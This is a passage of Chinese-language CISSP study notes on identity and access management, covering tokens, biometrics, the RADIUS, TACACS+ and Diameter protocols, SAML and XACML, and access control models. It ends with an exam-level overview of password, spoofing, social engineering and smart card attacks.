很多。类型有两种:同步动态密码令牌,和异步动态密码令牌。 同步动态密码令牌创建同步动态密码的硬件令牌是基于时间的(或基于计数器/事件型生 成器),并与身份认证服务器保持同步。他们定期生成一个新密码,如每隔 60 秒。这也就要 求令牌和服务器必须有精确的时间。 异步动态密码不用时间,依据算法和递增计数器生成密码。有些令牌则是由用户输入认证 服务器提供的 PIN 码后,会生成一次性密码。 最后讲讲软令牌: 软令牌存储在计算机上,需要通过身份验证的第二个因素来激活,如 PIN 密码或生物特征。 相较于硬件令牌,软令牌比较便宜,易于实现和管理,能避免一些物理安全风险。然而,软令 牌也很容易受到计算机病毒,中间人攻击,钓鱼,和其他软件的攻击。使用软令牌要遵循以下 准则: ①私钥必须是不可导出的。 ②密钥必须是加密存储的。 ③种子记录和初始密码短语的分发必须加密。安装软令牌软件通常有两条信息:种子记录 和密码,两者都需要安装和初始化令牌生成引擎。这两条信息,如果被未经授权的用户捕获, 可能导致未授权软件的安装和未经授权的使用。 ④每次使用软令牌的用户必须进行身份验证,令牌必须被激活。 ⑤令牌时限必须少于 2 分钟。 ⑥软令牌软件的密码应符合密码管理原则 ⑦审计所有软件令牌的访问。 ⑧使用软件令牌之前,必先安装最新的防病毒软件。 ⑨始终使用 FIPS 140-2 验证的加密模块。其加密模块必须被验证,以满足 FIPS 140-2 第 1 级标准。 ③ISO/IEC14443,智能卡标准 14443-1——物理特性 14443-2——射频功能及信号接口 14443-3——初始化和零冲突 14443-4——传输协议 —157— 4.生物识别 Biometrics 生物识别属于第 3 类身份认证因素,即,你是什么? ①生理识别方法。包括指纹、面部扫描、视网膜扫描、虹膜扫描、手掌扫描、手形和语音 模式。 ②行为识别方法。包括动态签名和击键模式(击键力学),也称为你所做(something-you-do) 的身份认证。 指纹都很普通,主要讲下别的: *视网膜扫描(Retinal Scanning)的是眼睛后方血管的图案,它会泄露个人健康状况。 视网膜没有虹膜那么多的生物多样性,也容易变化。 *虹膜扫描(Iris Patterns)是最精确的生物认证形式,扫描的是瞳孔周围的有色区域, 它一生都不会变。它可以区分同卵双胞胎的,甚至同一个人的左右眼。 *手掌扫描(手掌特征或手掌纹理)是用近红外光测量手掌的静脉。 *手部外形识别手部的物理尺寸,包括手掌和手指的宽度与长度,即手的轮廓,它不能捕 捉指纹细节或静脉模式。这种方法比较难识别出一个人的独特性。不好用。 *声音识别依靠一个人说话的声音特点,称为声纹。也不好用。 *签字力度识别主体如何书写字符串,依赖于用笔的压力、笔划方式、笔划长度以及提笔 时间点。 *击键模式(击键力度)通过分析抬指时间与按压时间来分析主体使用键盘的方式。误差比 较大。 生物识别的灵敏度极易产生 2 种错误:误报(false positive)或漏报(false negative), 为了提高准确度,有几个重要的指标参数(一拒二收,开始是拒绝的,后来接受了): ①一类错误/拒绝 Type 1 Error,即错误拒绝率(FRR) false rejection rate,正确的主 体被拒绝的概率,就是识别太敏感了,动不动就不认。 ②二类错误/滥收 Type 2 Error,即错误接受率(FAR) false acceptance rate,错误的 主体被接受的概率,就是识别太模糊了,什么都认。 ③交叉错误率(CER)/相等错误率(ERR)。就是两类错误相同时的概率指标,代表了系统经 调校后的综合识别能力水平,最低越好。 当然,根据组织的需求,可以让某一类错误多出些,另一类最好不出。 —158— B.3 可追溯性 Accountability 可追溯性/可问责性/审计是能够确定谁或什么是负责的操作,并可以追究责任。强大的身 份识别,认证,审核和会话管理的背后最终驱动力之一就是问责制。 问责在很大程度上依赖于不可抵赖性,但它们还是有区别的。不可抵赖性是与信息保障密 切相关的一个话题;否定是否认一个动作,事件,影响或结果;不可抵赖性是确保用户不得否 认行动的一个过程。问责在很大程度上依赖于不可抵赖性,以确保对用户的流程和行动可以被 追究责任。 一、授权和可问责性 Authorization and Accountability ①授权。依据主体的证明身份授予其访问客体权利。 ②可问责性/可追溯性。在执行审计时用户和其他主体要对自己的行为负责。 补充知识: 授权蠕动(authorization creep) 当雇员在一家公司长期工作时,他们会从一个部门调动到另一个部门,因此常常被赋予越 来越多的访问权限和许可。这种情况通常称为授权蠕动(authorization creep)。 擦洗(scrubbing) 攻击者经常会删除保存其犯罪活动信息的审计日志(删除审计日志中特定犯罪数据的行为 称为“擦洗(scrubbing)”。 二、AAA 协议 提供认证、授权和可问责性的协议叫做 AAA 协议。authentication, authorization, and accounting(最后一个可问责性有的地方描述为“审计 Audit”,效果和意思都是一样的)。AAA 协议就是指功能完备的严格的访问控制协议。他们提供集中式访问控制,附带例如虚拟专用网 (VPN)和其他类型的网络访问服务器的远程访问系统。他们可以保护内部局域网认证系统和其 他服务器遭受远程攻击。当使用一个单独的系统进行远程访问时,对系统的成功攻击只会影响 远程访问用户。一些常见的 AAA 协议有 RADIUS、TACACS+ 以及 Diameter。上一章节“单点登 —159— 陆里”讲的 kerberos 也是 AAA 协议。 下面讲的是集中式“访问控制管理”centralized ACA,access contrl administration。 分散式 decentralized 的比较简单,不讲了。 1.RADIUS(Remote Authentication Dial-In User Service) 远程认证拨号用户服务器(RADIUS)主要用于远程连接的身份认证。RADIUS 服务器为多个 远程访问客户端提供 AAA 服务。许多互联网服务提供商(ISP)使用 RADIUS 进行身份认证。用户 可以在任何地方访问 ISP。RADIUS 采用用户数据报协议(UDP),并只加密交换密码协议,不会 加密整个会话,但可以使用附加协议来对数据会话进行加密。RADIUS 是一个集中认证机制, 提供认证,授权和计费。使用 802.1x 是的一个改进形式,这是一个 EAP 和 RADIUS 的组合, 在发送用户标识是使用明文,但密码是加密的。 总的来说,RADIUS 有以下问题。它: ①己成为密码攻击的受害者,已经被重放攻击成功攻击。 ②缺乏完整性保护。 ③只有特定字段使用加密(仅密码加密)。 2.TACACS+(Terminal Access Controller Access Control System) 终端访问控制器访问控制系统(TACACS)是 RADIUS 的一种升级和替代,思科提出的商业协 议。后来推出了扩展 TACACS (XTACACS),并将其作为一项专有协议。然而,TACACS 和 XTACACS 如今都不常用。后来,又推出了 TACACS+,并被作为一个开放的协议,成为了三个协议中最常 用的一个。 ①TACACS 将它的身份验证和授权过程组合在一起。(使用固定密码) ②XTACACS 将身份验证、授权和审计过程分隔开。 ③TACACS+则在 XTACACS 基础上采用双因素用户身份验证。(使用动态(一次性)密码) TACACS+(网络设备查询服务器验证密码)将认证、授权以及可问责分为独立的流程,并 可以在三个独立的服务器上进行托管。TACACS+可以加密所有的认证信息,而不仅仅像 RADIUS 一样只是加密密码。TACACS 和 XTACACS 使用的是 UDP 端口 49,而 TACACS+使用的是传输控制 协议 TCP 端口 49,为数据包的传输提供了更高的可靠性。上面 2 个的区别: RADIUS TACACS/XTACACS TACACS+ 数据通信 UDP UDP:49 TCP:49 数据加密 仅加密传输的用户密码 唔知 加密客户端-服务器全部流量 AAA 功能 集中整合合认证和授权 前者整合/后者分离 验证、授权和审计过程分隔开 协议支持 仅 PPP 连接 唔知 还支持 IPX、AppleTalk、NETBIOS 挑战响应 对所有 AAA 活动仅执行 一次挑战响应认证(单) 唔知 对各项不同的 AAA 活动分别 执行挑战响应认证(多挑战) 3.Diameter 基于 RADIUS 和 TACACS+的成功应用,又开发出了一个名为 Diameter 的 RADIUS 的增强版 本。它支持多种协议,包括传统 IP、移动 IP、IP 传真和 IP 语音(VoIP)。因为其支持许多附 加的命令,尤其在支持漫游服务情况下特别受欢迎,例如无线设备和智能手机。虽然 Diameter 是 RADIUS 的升级版本,但是其并不兼容 RADIUS。 —160— Diameter 使用的是 TCP 端口 3868,或流控制传输协议(SCTP)端口 3868,相比于 RADIUS 使用的 UDP 端口来说,提供了更好的可靠性。它也支持网际安全协议(IPsec)和传输层面安全 协议的加密。Diameter 这个名称也意味着 Diameter 要比 RADIUS 好两倍。 前面讲的 RADIUS 和 TACACS+都是客户端/服务器协议,服务器只能被动作出响应。而 Diameter 是一个对等协议,允许任何一端发起通信。只要考题里涉及了 VoIP 或者对等服务, 那一定是选 Diameter 集中访问控制系统了。 4.总结: RADIUS:开放 C/S,仅 PPP 拨号,UDP,仅加密密码,AAA 整合,远程审计,单挑战,256AVP。 TACACS:身份验证+授权=》不分离,UPP。 X-TACACS:扩展的,AAA 分离即隔离=验证-授权-审计。 TACACS+:C/S,动态密码,多网络协议,TCP,全加密,AAA 分离,更多 AVP,多挑战。 Diameter:对等通信,TCP,移动 IP,VoIP,不兼容,2 32AVP,AVP 是指属性值对。 B.4 会话管理(例如:超时、屏保) 很简单。区分桌面会话(人面界面)和逻辑会话(后台通信)。 B.5 身份注册与证明 身份验证是收集和验证身份信息的过程,验证某人所请求的帐户或凭证确定是其本人。 1.电子认证 电子认证(E 认证)是建立在信任用户提交电子身份给信息系统的过程。 2.美国联邦机构之间的信任 在美国,联邦机构负责核实或验证个人身份的问题凭据,一旦某人或主体的信任被认可, 就会建立和绑定身份证明到个人身份验证(PIV)证书(相当于 kerberos 里的 TGT),有了证书, 就可以被整个联邦企业信赖和接受。 3.联合身份管理 在联合环境中,联盟中的每个组织应遵守的一套共同的政策,标准和程序,并配置和管理 用户身份标识,身份验证,授权信息。这样,用户可以实现跨平台的单点登陆。联合身份管理 系统使用两种方法来实现信任链:一是交叉认证,二是第三方认证。 4.交叉认证模式 每个组织都必须单独证明每一个其他参与组织都值得信任(任意两个之间都要确认可信)。 这样,一旦组织的数量达到几个以上,组织之间的信任关系会急剧增加(类似于对称密钥的管 理)。 5.可信的第三方模型 很多集中式的身份认证都是这样的。PKI 什么的。 B.6 联合身份管理(例如:SAML) 一、联合身份管理与 SSO 一个完整的体系可以用 Kerberos 来实现单点登陆,但如果在互联网上或者其它很多异构 集成的系统环境里,只能靠联合身份管理来实现单点登陆了。像使用 QQ、微信就可以登陆各 —161— 大论坛什么的,这里要重点讲各种系统间交互通信使用的语言了: 其中 SAML 主要用于单点登陆;XACML 主要用于软件定义网络。 ①GML=>SGML=>HTML 超文本标记语言超文本标记语言(HTML)用于展示静态网页,它源自通用标记语言(GML) 和 标准通用标记语言(SGML)。 ②XML=>SAML 可扩展标记语言(XML)不仅是对数据显示方式的描述,它实现了对数据本身的描述。安全 断言标记语言(SAML) Security Assertion Markup Language 是一种基于 XML 的语言,也称安 全声明标记语言。普遍用于联合组织之间交换认证和授权(AA)信息(提供身份验证信息给联合 身份管理系统,即以标准格式发送诸如密码、密钥或者数字证书等身份验证消息),为浏览器 访问提供单点登录(SSO)功能。SAML2.0 实现基于 Web 的认证和授权方案,包括单点登录(SSO)。 SAML 规范定义了三种角色:User 委托人 IDP 验证 SP 服务 *委托人(通常是用户) principal。 *身份提供者(IDP) identity provider。 *服务提供商(SP) service provider。 当使用 SAML,委托人请求来自服务提供商的服务。服务提供商请求并获取身份提供者的 身份声明。在此声明的基础上,服务提供商可以进行访问控制决策。 SAML 数据可以通过不同类型的协议传输,但常用的一个协议是简单对象访问协议(Simple Object Access Protocol)。SOAP 是一个规范,规定了如何以结构化方式交换与 Web 服务有关 的信息。它提供了基本的消息框架,使得用户可以请求一个服务,同时,该服务也可以提供给 该用户。比如,你需要与你公司的顾客关系管理系统进行交互,假设该系统由供货商 A.com 托 管和维护。你登录公司的门户网站后点击 A.com 的链接,你公司的门户便会接受这个请求和你 的身份验证数据,然后以 SAML 形式打包,把数据封装进入一个 SOAP 消息。这个消息通过 HTTP 连接发送给 A.com 供应商网站,一旦你的身份得到验证,你便会看到公司顾客数据库的内容了。 以这种方式使用 Web 服务也使得组织可以提供面向服务体系结构 SOA(Service Oriented Architecture)的环境。 ③XML=>DSML=>SPML 服务供应标记语言(SPML) Service Provisioning Markup Language 是基于 XML 的新框架, 但是出于联合身份单点登录目的,专门设计用于用户信息交换(交换供应数据 )。SPML 基于 目录服务标记语言(DSML) Directory Service Markup Language,而 DSML 可以 XML 格式显示 基于轻量级自录访问协议(LOAP)的目录服务信息。 SPML 由 3 个主要实体组成:RA 请求 PSP 响应 PST 供应 *请求机构 RA(Requesting Authority):请求建立新账户或对己有账户进行修改的实体。 *供应服务提供者 PSP(provisioning Service Provider):响应账户请求的软件。 *供应服务目标 PST(provisioning Service Target, PST):在被请求要修改的目标系统 上执行配置活动的实体。 ④XML=>XACML/EACML 扩展访问控制标记语言(XACML) Extensible Access Control Markup Langua 用于在 XML —162— 格式内定义访问控制策略(SAML 发送身份验证消息,但并判断用户的访问权限),并且它通 常实现基于角色的访问控制。XACML 既是一个描述访问控制策略的语言,又是一个以标准化方 式解释和执行策略的处理模型。XACML 有助于给联盟中所有成员提供保证,保证他们向不同角 色授权相同级别的访问。 XACML 也有几个重要的组件:主体 行动 资源 *主体单元(请求实体) requesting entity。 *资源单元(被请求实体/客体) The requested entity /Resource unit。 *行动单元(访问类型/权限参数) types of access。 ⑤总结: GML>SGML>HTML:HTML 的演变过程 SPML(Service Provision):服务供应:改账户:管理异地账户,交换应用数据,RA>PSP--PST SAML(Service Assertiong):断言标记:发账户:SOAP+SOA 交换身份验证和授权数据 XACML/EACML(extensible Access Control):扩展访问:加权限:加上安全策略 SOAP(Simple Object Access Protocol):Web 服务的信息交换的结构化的方式 SOA(Service oriented architecture):对在不同业务领域,不同的系统,用统一的方 式提供独立的服务 ⑥XML 与 HTML 的设计区别是:XML 被设计为传输和存储数据,关注的是数据的内容。而 HTML 被设计用来显示数据,关注的是数据的外观。HTML 旨在显示信息,而 XML 旨在传输信息。 XM 和 HTML 语法区别:HTML 的标记不是所有的都需要成对出现,XML 则要求所有的标记必 须成对出现;HTML 标记不区分大小写,XML 则大小敏感,即区分大小写。(XML 语法更严) B.7 凭证管理系统 身份凭证和访问管理(ICAM)是结合数字身份和相关属性、凭证和访问控制的一个全面方 法。国土安全部总统第 12 号令(HSPD-12)初步提供了一个通用的,标准化的身份凭证,使普通 的物理访问证书安全并可互操作的在线交易。 现有的访问控制系统都升级过渡到“身份凭证和访问管理系统 ICAM”了。 C.整合身份即服务(如云身份) 整合身份服务 Integrating Identity Services/身份云服务 身份即服务,或身份和访问即为服务(IDaaS),是一个第三方服务,SaaS 的一种,提供身 份和访问管理。IDaaS 为云有效提供单点登录,并在内部客户访问那些基于云的软件即服务。 谷歌、微软都提供 IDaaS,方便用户访问云资源。IDAAS 功能包括: *身份管理:账号注册与维护。 *访问管理:用户认证,单点登录和强制授权。 *日志报告:行为记录。 它的功能角色就是实现更大的层次的安全策略,也主要实现管理企业的口令及其同步。 IDaaS 的典型案例:WidePoint Corp. —163— D.整合第三方身份服务(例如:内部部署) 有 3 种方法来实施基于云的用户帐户管理,如 Office365 什么的软件: ①云的身份标识:在 Office 365 中用户创建和管理,并存储在 Windows Azure 活动目录 (AD)。没有连接到任何其他目录。云身份没有集成的要求。每个用户在云中创建一次,账户只 存在于 Windows Azure AD 中。 ②目录同步:用户创建和管理有一个前提—身份提供者和 Windows Azure 的 AD 都是同步 的,用于登录到 Office 365 目录同步使用现有的本地目录并同步到 Windows Azure AD。这种 同步可以完成从一个本地活动目录使用目录同步工具,或从非 AD,本地目录使用 PowerShell 和 Azure AD 图形 API。同步意味着帐户被本地管理和属性不育街恿过 Office 365 云接口进行 编辑。如果目录同步工具用于与 AD,那么口令散列也可以同步,因此用户可以在本地和云中 使用相同的密码登录。 ③统一身份/联合身份:除了目录同步,还对内部的身份提供登录处理请求。联合身份通 常是用于实现单点登录。联合需要一个用户在使用联合身份时提供商对用户的密码进行检查。 目录同步需要以填充基于云的目录作为一个先决条件。当使用联合身份时,许多 Office 365 的客户使用活动目录联合服务,其中管理登录密码检查在本地 Microsoft 活动目录基础设施。 一些客户使用第三方身份提供商:微软支持 Office365 与各种资质合格的第三方身份提供商。 E.实施和管理授权机制(授权机制的实现与管理) 一、怎么确定一个用户的访问权限? 有几种机制来实现: 1.隐式拒绝 Implicit Deny 访问控制的基本原则是隐式拒绝,也就是默认拒绝,除非有授权。 2.访问控制矩阵 Access Control Matrix 一个访问控制矩阵是一个包括主体、客体和分配权限的表格。其内容远远超过一个单一的 访问控制列表(ACL)。 下面讲的功能表指定了某些主体对特定客体进行操作的访问权限。功能表和 ACL 完全不 同,这是因为主体被绑定在功能表中(横的行),而客体被绑定在 ACL 中(竖的列)。 3.功能表 Capability Tables 功能表是确定分配给主体特权的另一种方式。也不同于 ACL,因为功能表关注主体(如用 户、组或角色)。例如,为会计角色创建的功能表将包括会计角色可以访问的所有客体列表, 以及分配给会计角色对这些对象的特定权限。相比之下,ACL 专注于客体,会列出被授权访问 文件的所高用户和/或组以及其具体授权内容的文件。 访问控制矩阵=功能表(行)+访问控制列表(列);ACM=CT+ACL 4.限制接口 Constrained Interface 如果用户没有权限去使用它,那么一个常见的方法是隐藏功能。例如,菜单命令不出现或 者是灰色的、禁用的。 5.基于内容的控制 Content-Dependent Control 数据库视图是基于内容的控制。一个视图从一个或多个表中的检索特定列,创建一个虚拟 —164— 表。被授子访问视图权的用户可以看到特定的数据字段,但不能访问底层表中的数据。 6.基于上下文的控制 Context-Dependent Control 在授予用户访问之前先审查用户之前特定的行为。例如,网上购物,如果购物车中的没有 产品,就不可能进入支付功能;限制某资源的访问时间段也是这种机制。 7.需知/知其所需/知所必须 Need to Know 就算有机密级的授权,也不能所有机密都看,只能被授予看自己工作业务有关的内容。 8.最小特权 Least Privilege 主体只被授予他们完成工作职能时所需要的最小特权。和“需知”差不多,“特权”包括 增、改、删什么的,“知”只包括查看。 9.职责分离 Separation of Duties and Responsibilities 关键数据、敏感功能必须分成由两个或两个以上员工来执行任务,这有助于通过创建一个 制衡系统来防止共谋 Collusion、欺诈 Fraud 和错误。 CISSP 考试通常会在问题中拼出所有术语和缩略词,你不需要记住缩略词,不过最好还是 熟悉下这些缩略语。 二、访问控制模型 就是指明主体如何访问客体的框架。通过访问控制技术和安全机制来加强模型的规则和目 标。最常见有 3 种:自主、强制、角色,还有规则、非自主、基于属性也会考到。 E.1 基于角色的访问控制方法(R-BAC) R-BAC 有助于通过防止特权蠕变(creep),从而实施最小特权原则。特权蠕变是用户随着 角色和访问需求的变化不断积累特权的过程和趋势。基于角色的访问控制在有频繁人事变动的 动态环境中是有用的,因为管理员只需将新用户添加到适当的角色就可以轻松地授予多个权 限。角色的访控主要是管主体的权限,而后面讲的自主访控主要是管客体的访问控制列表。与 此类似的还有一种基于任务的访问控制模型:TBAC。 RBAC 提供两者职责分离(separations of duties)。 ①静态职责分离 SSD(Static Separation of Duty (SSD) Relations through RBAC): 这种职责分离通过限制特权的联合(比如:用户不能是出纳和会计角色)来防止欺诈。 ②动态职责分离 DSD(Dynamic Separation of Duties (DSD) Relations through RBAC): 这种职责分离通过限制可能在任何会话中启动的特权的联合(事实上:用户不能同时成为收银 员和收银员监视者,但是用户可以是两个组的成员)来防止欺诈。 考题里会有一种混淆迷惑: 终端用户把某一个文件的访问权限分配给某一个用户组(如 Guest 组),这种方法不是基 于角色,而是自主访控。因为最关键的要素是:基于角色的权限分配一定是由集中的授权者来 实现的,也就是高级的系统管理员。只要是自己来分配,不管怎么分配,都是自主的访问控制。 RBAC 模型在具体软件中的实现方法有 2 种:: ①核心 RBAC 这个组件会集成到每一个 RBAC 实现中,其原因在于它是 RBAC 模型的基础。用户、角色、 —165— 权限、操作和会话应根据安全策略进行定义和对应。 • 用户和特权之间存在一种多对多关系。 • 会话是某个用户和一个己分配角色子集之间的对应关系。 • 提供传统但健壮的、基于组的访问控制。 许多用户可以属于多个组,并拥有每个组所享有的各种特权。当用户登入时(这是一个会 话),该用户所分配到的各种角色和组将立即对这名用户有效。如果你是 Accounting 角色、 RD 组和 Administrative 角色的成员,那么你在登录后将立即拥有分配给这些组的所有权限。 因为在作出访问决策时能够包含其他组件,而不是仅仅根据一组凭证作出决策,所以这种 模型提供了健壮的选择。RBAC 系统还可以配置为包含时间段、角色位置、星期几等。这意味 着,除了用户 ID 和凭证之外,其他信息也可以用于访问决策。 ②层次化 RBAC 这个组件允许管理员建立一个组织化 RBAC 模型,该模型对应特定环境中需要的组织机构 和功能描述。因为各种业务己经建立在一个人员层次化结构中,所以该组件非常有用。很多时 候,你在行政管理系统中的位置越高,你所拥有的访问权限就越多。 (1) 角色关系定义了用户成员和权限继承。例如,护士角色能够访问某些文件,实验室技 术员角色则能够访问另外一些文件。医生角色继承了上述两个角色的权限和访问权利,而且还 具有已经为医生角色分配的更多权限。因此,层次化是其他角色权限和权利的累积。 (2) 反映组织机构和功能描述。 (3) 存在两种层次类型: • 有限层次只允许一个层次级别(角色 l 继承角色 2 的权限,并且没有继承其他角色)。 • 普通层次允许多个层次级别(角色 1 继承角色 2 和角色 3 的权限)。 层次是一种划分角色结构并反映组织机构授权和责任的自然方法。角色层次定义角色之间 的继承关系。这种模型提供了两种不同的职责分离。(静态的 SSD 和动态的 DSD) RBAC 实施控制的基本架构有 4 种: ①非 RBAC 非 RBAC 授予用户访问数据或通过传统的映射应用程序,如 ACL。这些没有正式的“角色” 与映射关联,除了通过特定用户的任意标识。 ②受限 RBAC 是当用户映射角色在单个应用程序,而不是通过组织范围的角色结构。在一个受限的 RBAC 系统的用户能够访问 non-RBAC-based 的应用程序或数据。受限 RBAC 的关键属性是用户的角 色是在一个应用程序中定义的,而不是基于用户的组织工作的职能。 ③混合 RBAC 基于用户在组织内特定的角色,适用于多个应用程序或系统。这角色然后应用于应用程序 或系统,注册到组织的基于角色的模型。然而,随着“混合”一词表明,存在这样的情况,用 户还可以被分配给仅在特定的应用程序定义的角色 ④全 RBAC 是由组织的策略和访问控制的基础设施定义的角色控制,然后应用到整个企业的应用程序 和系统。基于企业的应用程序,系统,以及相关的数据应用来定义权限,而不是一个特定的应 —166— 用程序或系统定义。 E.2 基于规则的访问控制方法(Rule-BAC) 一个基于规则的访问控制(Bule-BAC) Rule-based Access Controls,使用一套规则、限 制或过滤器来确定能和不能出现在一个系统上的东西。它包括给予主体访问客体的权利,或授 予主体执行一个动作的能力。有关规则-BAC 模型的一个独特特征是他们有适用于所有主体的 全局规则。也就是说,它不区分用户,只看规则;不识别身份,只看行为。 规则-BAC 模型的最常见例子就是防火墙。防火墙包括 ACL 中的一组规则或过滤器,由管 理员定义。防火墙都包含一个全局的、最终的规则(称为隐式拒绝规则),会拒绝所有没有设定 的流量(白名单)。 基于规则的访问控制还有另一实现方式:即基于属性的访问控制模型(ABAC) Attribute-based Access Controls。使用了属性比规则要更具体一些。许多软件定义的网络 应用程序使用 ABAC 模型,可以定义不有的角色使用不同的网络服务。 E.3 强制访问控制(MAC) 强制访问控制(MAC)mandatory access control 模型,需要使用分类标签,并不使用规 则。每个分类标签代表一个安全域或者安全领域。安全域是共享一个公共安全策略的主客体集 合。也就是说,主体分为不同的密级,客体也分为不同的密级,同一密级的算是一个安全域。 在桔皮书(通用准则 CC)里是等级 B。(前面基于规则的访问控制是不使用标签的),不过强 制访控也算是基于规则的一种。 MAC 模型通常被称为基于格子的模型 lattice-based model。MAC 模型是抑制型的、禁止 性的,它基于隐式拒绝原则(implicit‐deny philosophy),而不是直接拒绝原则(explicit ‐deny philosophy)。当然,同一密级的用户也要根据“知需”原则区分访问权限,同一密级 的客体也要分成不同的组。不能什么都能看。这样,MAC 访问控制模型就有 3 种应用方式: MAC 模型中的分类使用以下三种类型的环境之一(分层+隔离+混合): ①分层环境 Hierarchical Environment 只区分密级来管理,高密级用户可以看低密级数据,低密级肯定不能访问高密级了。 ②隔间区分环境 Compartmentalized Environment 不分密级,只按内容分隔间。每个域代表一个单独的隔间,有单独的权限管理。 ②混合环境 Hybrid Environment 又分密级,又按内容分隔音。也就是客体管理的粒度更小了,不过管理起来也更麻烦。 这里插播一下“域”: 术语“域”早在 Microsoft 创办之前就己存在,CISSP 中多次出现“域”。然而,当人们 听到这个术语时,他们通常想到的是网络区段中一组由一台运行 Microsoft 软件的服务器(称 为域控制器)控制的计算机和设备。实际上一个域只是某个主体可用的一组资源。需要记住的 是,主体可以是用户、进程或应用程序。在操作系统内部,每个进程都具有一个域,也就是该 进程在执行自己的任务时可用的一组系统资源。这些资源可能是内存段、硬盘空间、操作系统 —167— 服务以及其他进程。在网络环境中,一个域是一组可用的物理和逻辑资源,包括路由器、文件 服务器、FTP 服务、Web 服务器等。 术语“安全域”建立在域的基础之上,增加的内容只是这个逻辑结构(域)内的资源在相同 安全策略下运行,并且由同一个组管理。因此,网络管理员可能会将所有的会计人员、计算机 和网络资源放入域 l 中,而将所有的管理人员、计算机和网络资源放入域 2 中。这些项属于不 同的容器,因为它们不仅实现相似的业务功能,而且更重要的是,它们具有相同的信任级别。 正是这种共同的信任级别,才允许若干实体由单个安全策略管理。 不同的域由逻辑边界分隔,如防火墙、目录服务器等 。所有这些安全机制都是为每个域 实施安全策略的组件。 域可以采用层次化结构,这种结构说明了不同域之间的关系以及不同域内主体的通信方 式。主体能够访问相同或更低信任级别的域中的资源。它们的通信信道由安全代理(防火墙、 路由器 ACL、目录服务)控制,不同的域则使用特定的子网掩码地址隔离。 需要记住的是,域不仅适用于网络设备和区段,而且还可以应用于用户和进程。 AIO 教材在关于单点登录的相关小节中谈到了域,这是因为,目前有几种不同的技术可用 于定义和实施这些域以及与之对应的安全策略:Windows 环境中的域控制器、企业资源管理 (ERM)产品、Microsoft Passport(现在的 Windows Live ID)以及提供 SSO 功能的各种产品。 所有这些技术的目标是允许用户(主体)只需要登录一次就可以访问不同的域,而不必重新输入 其他任何凭证。 E.4 自主访问控制(DAC) 1.自主访问控制(DAC) Discretionary Access Controls 由客体的所有者、创建者或一个客体的数据保管者来自行控制和定义主体对该客体的访 问。常常使用客体的访问控制列表(ACL)来实现 DAC 模型。在桔皮书(通用准则 CC)里是等级 C。 自主访控有时也被称为基于身份的访问控制(identity‐based access control model)。 基于身份的访问控制是 DAC 的一个子集,因为系统识别用户身份并分配资源给这个身份。 2.非自主访问控制(NDAC) Nondiscretionary Access Controls 管理员对不可任意支配的访问控制进行集中管理。任何不是自主访问控制的模型都是非自 主的。这包括基于规则、基于角色和基于格子的访问控制(前面都讲过)。 实际考题有问到哪个是非自主访问控制,答案一般都是基于角色的访问控制;如果问到非 自主访问控制的模型特点,一般都是“通过中央授权来决定主体可以访问哪些客体”。 F.预防与减缓访问控制攻击 CISSP 里的经常讲到 mitigation,即 risk mitigation,翻译成风险消减最好。 一、骇客、黑客和攻击者 骇客、黑客和攻击者,Crackers, Hackers, and Attackers。 最早,骇客是干坏事的攻击者;黑客是不干坏事的技术高手;现在搞不清了,反正所有的 攻击者被是黑客。现在就是“攻击者”来指代这些人。其它基础的知识就不说了,有关的攻击 —168— 技术和案例都很多了。 二、APT/高级持续性威胁 Advanced Persistent Threat 有国家或政府背景的,集团化的,高技术水平的,持续长期的网络空间作战威胁。CBK 里 列举了塔吉特公司(Target)POS 机用户信用卡信息被窃的例子;其实 APT 最经典和轰动的案 例是“震网”病毒。 三、针对访问控制的攻击 1.访问聚合攻击 Access Aggregation Attacks 通过收集多个非敏感信息块,并将他们结合来获得敏感信息。(第三域,E.3 章节里的数 据库安全里,已经讲了聚合攻击和推理攻击)。网络侦察(Reconnaissance)就是是访问聚合攻 击,结合多种工具来识别系统的多个元素,如 IP 地址、开放端口、运行服务、操作系统等等。 应结合严格访问控制、“需知”和最小特权原则来预防聚合攻击。 2.密码攻击 Password Attacks 破了管理员密码或特权密码,也就得到了一切。所以很多单位都要求必须设置“强密码”。 ①字典攻击 Dictionary Attacks 密码攻击的一种,比暴力破解快此地,但必须要有好的字典。此外,字典式攻击经常会扫 描差别构建式密码。一个差别构建式密码是之前使用过的密码,但有一个字符的不同。例如, passwordl 是 password 更改一个字符后的密码,其它的如 Password、lpassword 和 passXword 也是。攻击者在生成彩虹表时经常使用这种方法。 ②暴力攻击 Brute-Force Attacks 密码攻击的一种,通过尝试所有可能的字母、数字和符号组合来发现用户帐户的密码。密 码越长,计算量就越大。还有一种常用的方法是:散列值匹配查找。因为密码都不会在网络上 发送,传输和存储的都是其散列值,所以只要能找到 1 个散列冲突(碰撞)collision,就可 以实现登陆破解了。要破解散列值,就要用到生日悖论和彩虹表了。 ③生日攻击 Birthday Attack 第三域 I.8 章节已经讲过生日悖论了。如果把 23 个人关在一个房间,那么任何两人同一 天生日的可能性有 50%;如果有 367 人在一个房间里,你会有 100%的机会获得至少两个有相同 生日的人。MD5 已经被破解了,SHA-3 目前还是安全的。 ④彩虹表攻击 Rainbow Table Attacks 彩虹表预先计算好的各种字符串和散列值的映射数据库。使用 4 种字符类型的 14 位字符 长度的密码的散列的彩虹表大约是 7.5GB 大小。这不大吧,可以大幅加快密码破解速度。 许多系统一般通过“加盐”密码来减少彩虹表攻击的有效性。盐是一组随机位,在散列前 加到密码中。加密方法在散列前就加入附加位,这样随机性更大了,使攻击者更难以使用彩虹 表密码 ⑤嗅探攻击 Sniffer Attacks 一个嗅探器(也称为数据包分析器或协议分析仪)是)个软件应用程序,通过网络捕捉和分 析流量。Wireshark 是一种受欢迎的协议分析器。 3.电子欺骗攻击 Spoofing Attacks/masquerading 电子欺骗(即伪装)是指假装成某物或某人等。电子欺骗的种类很多,有 IP 欺骗、邮件欺 —169— 骗、电话欺骗等等。 4.社会工程学攻击 Social Engineering Attacks 社会工程不难,但每次考试都会出几道题!社会工程就是与人斗,其乐无穷。 ①网络钓鱼 Phishing 钓鱼邮件告知用户虚假信息,然后就能骗到有用的信息,或者实现木马植入。 ②鱼叉式钓鱼 Spear Phishing 针对特定用户组的钓鱼方式。 ③捕鲸 Whaling 捕鲸是的目标是大鱼、高层或高管。 ④语音钓鱼 Vishing 纯属忽悠,就能搞定。 5.智能卡攻击 Smartcard Attacks 各种途径搞定卡的信息。 ①故障生成(fault generation)攻击 攻击者通过操纵智能卡的一些环境组件(改变输入电压、时钟频率、温度波动)来引入这些 “错误”。在向智能卡引入一个错误之后,攻击者会检查某个加密函数的结果,并查看没有出 现错误时智能卡执行该函数得到的正确结果。分析这些不同的结果使得攻击者能够对加密过程 进行反向工程,井有望获得加密密钥。这种攻击也称为故障生成攻击。 